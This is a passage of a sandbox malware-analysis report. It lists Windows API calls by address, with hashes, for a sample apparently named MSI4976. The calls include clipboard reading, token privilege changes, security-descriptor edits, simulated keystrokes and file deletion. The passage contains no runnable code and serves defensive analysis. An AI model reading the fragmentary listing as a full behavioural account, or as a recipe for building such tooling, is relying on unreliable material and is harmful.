                                        • GetCursorPos.USER32(?), ref: 0038FA3A
                                        • ScreenToClient.USER32(?,?), ref: 0038FA47
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0038FAA9
                                        • SendMessageW.USER32 ref: 0038FAD3
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0038FB12
                                        • SendMessageW.USER32 ref: 0038FB3D
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0038FB55
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0038FB60
                                        • GetCursorPos.USER32(?), ref: 0038FB81
                                        • ScreenToClient.USER32(?,?), ref: 0038FB8E
                                        • GetParent.USER32(?), ref: 0038FBAA
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0038FC10
                                        • SendMessageW.USER32 ref: 0038FC40
                                        • ClientToScreen.USER32(?,?), ref: 0038FC96
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0038FCC2
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0038FCEA
                                        • SendMessageW.USER32 ref: 0038FD0D
                                        • ClientToScreen.USER32(?,?), ref: 0038FD57
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0038FD87
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0038FE1C
                                        Strings
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                        • String ID: @GUI_DRAGID$@U=u$F
                                        • API String ID: 3461372671-1007936534
                                        APIs
                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0038AFDB
                                        Strings
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: %d/%02d/%02d$@U=u
                                        • API String ID: 3850602802-2764005415
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0033F796
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00394388
                                        • IsIconic.USER32(000000FF), ref: 00394391
                                        • ShowWindow.USER32(000000FF,00000009), ref: 0039439E
                                        • SetForegroundWindow.USER32(000000FF), ref: 003943A8
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003943BE
                                        • GetCurrentThreadId.KERNEL32 ref: 003943C5
                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003943D1
                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003943E2
                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003943EA
                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 003943F2
                                        • SetForegroundWindow.USER32(000000FF), ref: 003943F5
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039440A
                                        • keybd_event.USER32(00000012,00000000), ref: 00394415
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039441F
                                        • keybd_event.USER32(00000012,00000000), ref: 00394424
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039442D
                                        • keybd_event.USER32(00000012,00000000), ref: 00394432
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039443C
                                        • keybd_event.USER32(00000012,00000000), ref: 00394441
                                        • SetForegroundWindow.USER32(000000FF), ref: 00394444
                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0039446B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: af3f372210142aec6a6222e4832e90cf99e01290c04fbfc04da0c47f12f9977b
                                        • Instruction ID: dc1ba3744c1da6bf8edef0a2dc35177e64e2769a339bc32f16765b705b8f1adf
                                        • Opcode Fuzzy Hash: af3f372210142aec6a6222e4832e90cf99e01290c04fbfc04da0c47f12f9977b
                                        • Instruction Fuzzy Hash: FE318671A40318BFEF226B759C89FBF3E6CEB46B54F114025FA05EA1D0D6B15D01AEA0
                                        APIs
                                          • Part of subcall function 003231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003231DA
                                          • Part of subcall function 00367B9F: __wsplitpath.LIBCMT ref: 00367BBC
                                          • Part of subcall function 00367B9F: __wsplitpath.LIBCMT ref: 00367BCF
                                          • Part of subcall function 00367C0C: GetFileAttributesW.KERNEL32(?,00366A7B), ref: 00367C0D
                                        • _wcscat.LIBCMT ref: 00366B9D
                                        • _wcscat.LIBCMT ref: 00366BBB
                                        • __wsplitpath.LIBCMT ref: 00366BE2
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00366BF8
                                        • _wcscpy.LIBCMT ref: 00366C57
                                        • _wcscat.LIBCMT ref: 00366C6A
                                        • _wcscat.LIBCMT ref: 00366C7D
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00366CAB
                                        • DeleteFileW.KERNEL32(?), ref: 00366CBC
                                        • MoveFileW.KERNEL32(?,?), ref: 00366CDB
                                        • MoveFileW.KERNEL32(?,?), ref: 00366CEA
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00366CFF
                                        • DeleteFileW.KERNEL32(?), ref: 00366D10
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00366D37
                                        • FindClose.KERNEL32(00000000), ref: 00366D53
                                        • FindClose.KERNEL32(00000000), ref: 00366D61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 1867810238-1173974218
                                        • Opcode ID: b3de98d80e50c9d0e896824f823a3486f5083da6449cd25fd654d1178e76f314
                                        • Instruction ID: aa27d47d25db677051d8301b872903491389b8738943d7420797570138e2ce7a
                                        • Opcode Fuzzy Hash: b3de98d80e50c9d0e896824f823a3486f5083da6449cd25fd654d1178e76f314
                                        • Instruction Fuzzy Hash: 4051537290415CAADF22EBA0DC85EDE77BCAF09344F4485D6E54AE7041DB319B88CF61
                                        APIs
                                        • OpenClipboard.USER32(003BDBF0), ref: 003770C3
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 003770D1
                                        • GetClipboardData.USER32(0000000D), ref: 003770D9
                                        • CloseClipboard.USER32 ref: 003770E5
                                        • GlobalLock.KERNEL32(00000000), ref: 00377101
                                        • CloseClipboard.USER32 ref: 0037710B
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00377120
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0037712D
                                        • GetClipboardData.USER32(00000001), ref: 00377135
                                        • GlobalLock.KERNEL32(00000000), ref: 00377142
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00377176
                                        • CloseClipboard.USER32 ref: 00377283
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                        • String ID:
                                        • API String ID: 3222323430-0
                                        • Opcode ID: 1acdf0e7a745ed3c87c6f589a04de7c5bbe89c4f861c188344ca52ecafe7eca9
                                        • Instruction ID: 921f15950cff6a84330da559c2ce62d3d88b33b57d26490aa22fb3a12f6ff01a
                                        • Opcode Fuzzy Hash: 1acdf0e7a745ed3c87c6f589a04de7c5bbe89c4f861c188344ca52ecafe7eca9
                                        • Instruction Fuzzy Hash: 5A51B4312082016BD323EF60DC49F6E77ACAB85B00F418519F55AD65E1DF74D904DB62
                                        APIs
                                          • Part of subcall function 0035BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0035BF0F
                                          • Part of subcall function 0035BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0035BF3C
                                          • Part of subcall function 0035BEC3: GetLastError.KERNEL32 ref: 0035BF49
                                        • _memset.LIBCMT ref: 0035BA34
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0035BA86
                                        • CloseHandle.KERNEL32(?), ref: 0035BA97
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0035BAAE
                                        • GetProcessWindowStation.USER32 ref: 0035BAC7
                                        • SetProcessWindowStation.USER32(00000000), ref: 0035BAD1
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0035BAEB
                                          • Part of subcall function 0035B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0035B8C5
                                          • Part of subcall function 0035B8B0: CloseHandle.KERNEL32(?), ref: 0035B8D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                        • String ID: $default$winsta0
                                        • API String ID: 2063423040-1027155976
                                        • Opcode ID: ede637b385c090d40f7ebc795c6dc81ab59e5341abff7f69e300997fcba7b3a9
                                        • Instruction ID: 0163bcc80e147f12d572ad29d6e661fc04d6ce2931b5122a4281d0c054a136a4
                                        • Opcode Fuzzy Hash: ede637b385c090d40f7ebc795c6dc81ab59e5341abff7f69e300997fcba7b3a9
                                        • Instruction Fuzzy Hash: 70815571800208AFDF129FA4CD85EEEBBBCEF09305F154119FD55AA171DB318E199B20
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00372065
                                        • _wcscmp.LIBCMT ref: 0037207A
                                        • _wcscmp.LIBCMT ref: 00372091
                                        • GetFileAttributesW.KERNEL32(?), ref: 003720A3
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 003720BD
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003720D5
                                        • FindClose.KERNEL32(00000000), ref: 003720E0
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003720FC
                                        • _wcscmp.LIBCMT ref: 00372123
                                        • _wcscmp.LIBCMT ref: 0037213A
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0037214C
                                        • SetCurrentDirectoryW.KERNEL32(003D3A68), ref: 0037216A
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00372174
                                        • FindClose.KERNEL32(00000000), ref: 00372181
                                        • FindClose.KERNEL32(00000000), ref: 00372191
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1803514871-438819550
                                        • Opcode ID: 039ddc718b93cf15d694a262b3a8bce1acce91ec6e97a8dce557019c3d6305b1
                                        • Instruction ID: 561c8c3281442d044e1733762b80232a29660c950dff40eee504f7a5dab7f9ae
                                        • Opcode Fuzzy Hash: 039ddc718b93cf15d694a262b3a8bce1acce91ec6e97a8dce557019c3d6305b1
                                        • Instruction Fuzzy Hash: 9131A4326002197ADF22DBA4EC48EDF77ACAF0A360F508556F915E7190DB78DE44CB61
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • DragQueryPoint.SHELL32(?,?), ref: 0038F14B
                                          • Part of subcall function 0038D5EE: ClientToScreen.USER32(?,?), ref: 0038D617
                                          • Part of subcall function 0038D5EE: GetWindowRect.USER32(?,?), ref: 0038D68D
                                          • Part of subcall function 0038D5EE: PtInRect.USER32(?,?,0038EB2C), ref: 0038D69D
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0038F1B4
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0038F1BF
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0038F1E2
                                        • _wcscat.LIBCMT ref: 0038F212
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0038F229
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0038F242
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0038F259
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0038F27B
                                        • DragFinish.SHELL32(?), ref: 0038F282
                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0038F36D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                        • API String ID: 2166380349-762882726
                                        • Opcode ID: c1ea451c264641c5a39c8329f8424fd9bca7a42f2d9e9129b04485c85cbb5807
                                        • Instruction ID: 52cff6a467532f472abb21251f4fa1d0d60e571b4fdd50ec01e1949955fc1002
                                        • Opcode Fuzzy Hash: c1ea451c264641c5a39c8329f8424fd9bca7a42f2d9e9129b04485c85cbb5807
                                        • Instruction Fuzzy Hash: AC614972508300AFC712EF64EC85D9FBBF8BF89710F400A2EF595961A1DB709A05CB62
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 003721C0
                                        • _wcscmp.LIBCMT ref: 003721D5
                                        • _wcscmp.LIBCMT ref: 003721EC
                                          • Part of subcall function 00367606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00367621
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0037221B
                                        • FindClose.KERNEL32(00000000), ref: 00372226
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00372242
                                        • _wcscmp.LIBCMT ref: 00372269
                                        • _wcscmp.LIBCMT ref: 00372280
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00372292
                                        • SetCurrentDirectoryW.KERNEL32(003D3A68), ref: 003722B0
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003722BA
                                        • FindClose.KERNEL32(00000000), ref: 003722C7
                                        • FindClose.KERNEL32(00000000), ref: 003722D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 1824444939-438819550
                                        • Opcode ID: ae5438af081b438936413e4c76a3bcfb87b5ed70fe89acca1e7d3cd38ae641ee
                                        • Instruction ID: 1d9f1f842a60f3905baa200fa5ef33d20104bf5b24e9ed653cb78b02bb518022
                                        • Opcode Fuzzy Hash: ae5438af081b438936413e4c76a3bcfb87b5ed70fe89acca1e7d3cd38ae641ee
                                        • Instruction Fuzzy Hash: 2C31F6326002196ACF62DBA4EC48EDF73AC9F05320F118956F915A6191E774DE85CB64
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove_memset
                                        • String ID: Q\E$[$\$\$\$]$^
                                        • API String ID: 3555123492-286096704
                                        • Opcode ID: 70b7766c1bbcc6aff966500a5613486cf16e44e3b6e41af702cfa1936e9302c5
                                        • Instruction ID: 3350efd3538741c3cb9d375e53c716eaaf0d5a5f8e091493b4a9efb024d264d9
                                        • Opcode Fuzzy Hash: 70b7766c1bbcc6aff966500a5613486cf16e44e3b6e41af702cfa1936e9302c5
                                        • Instruction Fuzzy Hash: B272DE71D04229CFDF2ACF98C9816ADB7B1FF45314F2581A9D855AB381E334AE81DB90
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0038ED0C
                                        • GetFocus.USER32 ref: 0038ED1C
                                        • GetDlgCtrlID.USER32(00000000), ref: 0038ED27
                                        • _memset.LIBCMT ref: 0038EE52
                                        • GetMenuItemInfoW.USER32 ref: 0038EE7D
                                        • GetMenuItemCount.USER32(00000000), ref: 0038EE9D
                                        • GetMenuItemID.USER32(?,00000000), ref: 0038EEB0
                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0038EEE4
                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0038EF2C
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0038EF64
                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0038EF99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                        • String ID: 0
                                        • API String ID: 3616455698-4108050209
                                        • Opcode ID: 93345fbcf1d016b20020d4814328e98b313b3ada265785b511973b9ec1c0c6ed
                                        • Instruction ID: 0ced3a7ab226742315f211e00edfdb737c69724e49c6f7a44ac9ebf2dc3b1859
                                        • Opcode Fuzzy Hash: 93345fbcf1d016b20020d4814328e98b313b3ada265785b511973b9ec1c0c6ed
                                        • Instruction Fuzzy Hash: 3F81C371608311AFD712EF14C884AAFBBE8FF89354F0109ADFA959B291D730E905CB52
                                        APIs
                                          • Part of subcall function 0035B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0035B903
                                          • Part of subcall function 0035B8E7: GetLastError.KERNEL32(?,0035B3CB,?,?,?), ref: 0035B90D
                                          • Part of subcall function 0035B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0035B3CB,?,?,?), ref: 0035B91C
                                          • Part of subcall function 0035B8E7: RtlAllocateHeap.NTDLL(00000000,?,0035B3CB), ref: 0035B923
                                          • Part of subcall function 0035B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0035B93A
                                          • Part of subcall function 0035B982: GetProcessHeap.KERNEL32(00000008,0035B3E1,00000000,00000000,?,0035B3E1,?), ref: 0035B98E
                                          • Part of subcall function 0035B982: RtlAllocateHeap.NTDLL(00000000,?,0035B3E1), ref: 0035B995
                                          • Part of subcall function 0035B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0035B3E1,?), ref: 0035B9A6
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0035B3FC
                                        • _memset.LIBCMT ref: 0035B411
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0035B430
                                        • GetLengthSid.ADVAPI32(?), ref: 0035B441
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0035B47E
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0035B49A
                                        • GetLengthSid.ADVAPI32(?), ref: 0035B4B7
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0035B4C6
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0035B4CD
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0035B4EE
                                        • CopySid.ADVAPI32(00000000), ref: 0035B4F5
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0035B526
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0035B54C
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0035B560
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: ac10b8f56165ac3c2978533750005b98a33ea324b39f66bf42052fdb716094b0
                                        • Instruction ID: 240b5a2c92c9a34b4deceeceb836068e980b1bc67ee2f88e4e659ece47ced76e
                                        • Opcode Fuzzy Hash: ac10b8f56165ac3c2978533750005b98a33ea324b39f66bf42052fdb716094b0
                                        • Instruction Fuzzy Hash: 39515D71900209AFDF16DFA5DC45EEEBB79FF05301F048519F916AB2A1D7349A09CB60
                                        APIs
                                          • Part of subcall function 003231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003231DA
                                          • Part of subcall function 00367C0C: GetFileAttributesW.KERNEL32(?,00366A7B), ref: 00367C0D
                                        • _wcscat.LIBCMT ref: 00366E7E
                                        • __wsplitpath.LIBCMT ref: 00366E99
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00366EAE
                                        • _wcscpy.LIBCMT ref: 00366EDD
                                        • _wcscat.LIBCMT ref: 00366EEF
                                        • _wcscat.LIBCMT ref: 00366F01
                                        • DeleteFileW.KERNEL32(?), ref: 00366F0E
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00366F22
                                        • FindClose.KERNEL32(00000000), ref: 00366F3D
                                        Strings
                                        Memory Dump Source
